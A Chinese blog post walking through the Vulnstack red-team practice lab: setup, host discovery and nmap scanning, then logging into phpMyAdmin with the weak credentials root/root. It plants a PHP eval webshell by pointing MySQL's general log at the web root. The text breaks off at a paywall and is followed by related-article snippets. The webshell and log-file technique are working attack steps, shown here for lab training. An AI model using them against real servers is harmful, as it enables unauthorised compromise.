ATT&CK实战|Vulnstack 红队(一)

最新推荐文章于 2022-06-26 16:28:35 发布
最新推荐文章于 2022-06-26 16:28:35 发布
阅读量557 收藏
点赞数 1
分类专栏: 内网 文章标签: 安全 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blue_fantasy/article/details/122423955
版权

前期准备:

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/下载虚拟机

配置环境需要两张仅主机模式开启的网卡

构造这样的内网环境,Kali和Win7的外网IP处于同一网段,可以进行攻击,而Win7还有内网网段,通过拿下Win7机器继续攻击其处于内网同一网段的Win2003及其域控服务器。

首先登录Win7开启phpstudy,登陆密码hongrisec@2019,所有虚拟机密码都是这个。

复现:

因为在kali和win7在同一网段,所以可以使用netdiscover对主机IP进行探测

探测到129存在,应该就是目标Win7主机,对目标主机端口开放情况进行探测

nmap -sC -sV -Pn -p 1-65535 192.168.136.129

发现存在80端口开放,访问看到phpStudy探针页面,直接猜测佩戴了phpmyadmin,随即访问,猜测弱口令root/root登陆上去

接下来利用日志文件Getshell,参看我之前写的PHPMyadmin getshell到提权文章

show variables  like  ‘%general%’; #查看日志状态

SET GLOBAL general_log=’on’ ;#开启写日志记录

SET GLOBAL general_log_file=’C:/phpStudy/www/233.php’ ;#更改日志文件目录

写入一句话 SELECT ‘<?php eval($_POST[“cmd”]);?>’ ;蚁剑连接

这就拿到Win7机器的权限了,接下来就是进行对内网信息收集的过程了

内网信息收集

最低0.47元/天 解锁文章
blue_fantasy
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ATT&CK实战系列-红队实战(一)vulnstack 红日靶场一
weixin_68652890的博客
05-20 1703
文章目录信息搜集主机发现端口扫描目录扫描getshell用sql向日志文件写后门getshell网站后台getshell内网信息搜集域信息搜集探测内网存活主机和端口提升权限msf会话移交cscs提权横向移动密码收集psexec横向 信息搜集 主机发现 nmap 192.168.5.0/24 端口扫描 nmap 192.168.5.174 开放3306、80端口 目录扫描 python3 dirmap.py -i http:// 192.168.5.174 -lcf 其它方法 dirsearch -u h
ATT&CK靶场系列(一)
qq_1873822的博客
02-27 3700
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 拓扑结构大体如下: 靶机下载地址:https://pan.baidu.com/share/init?surl=nC6V8e_EuKfaLb2IuEbe7w 提取码:n1u2 开机密码:hongrisec@2019 因为要搭建一个内网环境,因此需要将虚拟机与外网隔绝,在VMware中可以通过虚拟机设置中的网络适配器来设置。 Windows7
红日内网渗透靶场1(ATK&CK红队评估实战靶场一)
qq_45780190的博客
02-21 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 网络拓扑 需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图。 将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)。 而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式
ATT&CK实战系列-红队评估(二)WP
h1nt的博客
08-15 782
环境搭建 靶场下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 根据平台介绍,虚拟机的密码统一为1qaz@WSX 将虚拟机导入后更改WEB靶机的IPV4地址为你所使用的NAT网段中的任意地址 这里注意可能一开始WEB靶机的账号密码不对,方法是使用Administrator账号登录,然后改回来即可 在目录 C:\Oracle\Middleware\user_projects\domains\base_domain 下有startWeblog
[VulnStack] ATT&CK实战系列—红队实战(一)
weixin_45605352的博客
08-19 1443
0x00 环境搭建 靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。 配置网卡,仅主机模式192.168.10.0网段模拟内网,192.168.43.0网段模拟外网: Web服务器:windows 7 外网网卡IP(桥接):192.168.43.17 内网网卡
ATT&CK实战系列-红队评估(一)
weixin_51801534的博客
12-22 2402
1.信息收集 ┌──(root????kali)-[~/桌面] └─# nmap -Pn -A -T4 192.168.1.100 2.指纹信息 3.┌──(root????kali)-[~/桌面] └─# nmap --script=vuln,auth 192.168.1.100 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令 4.目录扫描 5.访问探针进行信息收集 6.看到上面扫描的有phpmyadmin,访问phpmyadmin ...
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
最新发布
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
ATT&CK手册(修改版)
09-16
ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由美国非营利组织MITRE Corporation开发的一种框架,用于描述和分类网络攻击者的行为战术、技术和过程(TTPs)。这个框架是安全专家们理解和对抗...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK框架介绍及战技术对照表
05-18
ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由MITRE公司开发的一个公开的知识库,旨在提供一个统一的视角来理解和防御网络攻击。该框架详细描述了攻击者在不同阶段可能使用的战术、技术和程序...
VulnStrack01 内网渗透靶场
嘟的博客
07-07 469
环境配置 靶场信息:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 网路配置: 因为我的直接使用物理机作为攻击机所有外网网卡设置为nat模式。 外网网段vmnet1:192.168.72.0 内网网段vmnet2:192.168.52.0 windows7(web服务) 模拟外网ip:192.168.72.128 内网ip:192.168.52.143 域内主机 Win2K3 Metasploitable 内网ip:192.168.52.141 域控
vulstack红队评估(五)
PANDA墨森的博客
06-22 945
原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13118352.html 一、环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: Win7: heart 123.com #本地管理员用户 sun\Administrator dc123.com #域管用户,改为了panda123.. Win2008: sun\admin 2020.com #由于需要改密码,我更改为panda666... ②虚拟机网卡设置 Wi...
Windows系统——ATT&CK靶场(一)——MSF方式
qq_44029310的博客
06-26 2211
本文涉及知识点有:环境搭建,nmap使用,mysql日志文件写 shell,yxcms历史漏洞,进程迁移,提权,kiwi模块使用,3389相关,配置路由和代理,横向移动,msf相关使用等。
ATT&CK实战系列——红队实战(一)
热门推荐
江左盟的博客
10-09 1万+
环境搭建 靶机地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 网络拓扑结构图: 靶机配置: Web服务器(VM1)为Windows 7,需要双网卡,添加一个可访问的网卡即可,这里模拟外网的IP为:192.168.3.211,模拟内网IP为:192.168.52.143 域成员(VM2)为Win2K3 Metasploitable,模拟内网IP为:192.168.52.141 域控(VM3)为Windows Server 2008,模拟内网IP为
ATT&CK实战系列——红队实战(—)
plant1234的博客
03-25 3540
环境搭建 一共三台八靶机 密码都是:hongrisec@2019 网络结构: web服务器由win7来作 用WMware来启动三台机子 增加一个虚拟网口: 子网为:192.168.52.0 给win7在添加一个网络,自定义我们刚刚添加的VMnet2: 把另外两台都设置成VMnet2 进入win7配置网络: 配置网络一个是在:192.168.52.2的网段下 另一个是在:与自己的kali在一个网段下 在进入win7中启动phpStudy 并安装好yxcms WEB服务渗透 首先发现主机: 在对主机端
ATT&CK实战系列——红队实战(一)
5L2g556F5ZWl77yf
06-08 2518
文章目录环境搭建渗透测试部分phpmyadmin 日志 getshellyxcms前端 XSS任意文件写入 getshell任意文件删除后渗透阶段域控信息收集 环境搭建 下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 官方描述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可
内网之靶场之VulnStack红队(五)
shy的博客
11-13 2221
环境搭建: 外网:192.168.135.0 内网:192.168.138.0 边界机器:win7 外网:192.168.135.150 内网:192.168.138.136 账号: heart 123.com #本地管理员用户 sun\Administrator dc123.com #域管用户 内网机器:winserver 2008 内网:192.168.138.136 账号: sun\admin 2020.com #由于需要改密码,我更改为2020.com1...
[渗透测试]ATT&CK实战 | Vulnstack 红队(一)
Y4tacker的博客
12-07 1926
文章目录写在前面拿下webshell简单信息搜集CS上线继续信息搜集提权攻击域-接管整个域完结撒花 写在前面 无聊,再玩一个靶场,顺便记录下,也学了一些新东西 拿下webshell 打开网站以后发现是个php探针,没啥意义,除了试一试弱口令 同时使用dirsearch扫描 发现有phpmyadmin,尝试为弱口令root\root 查询SHOW VARIABLES LIKE "%SECURE%" 发现配置未开启,那么不能使用into outfile写马进去
构建与运营企业内部ATT&CK框架
ATT&CK是由MITRE创建的一种基于已知攻击技术的知识库,旨在帮助组织理解和防御高级持续性威胁(APT)的攻击手法。文档提到了ATT&CK的最新版本V9和2021路线图,包括对不同平台如MacOS、IaaS、SaaS、容器领域的攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值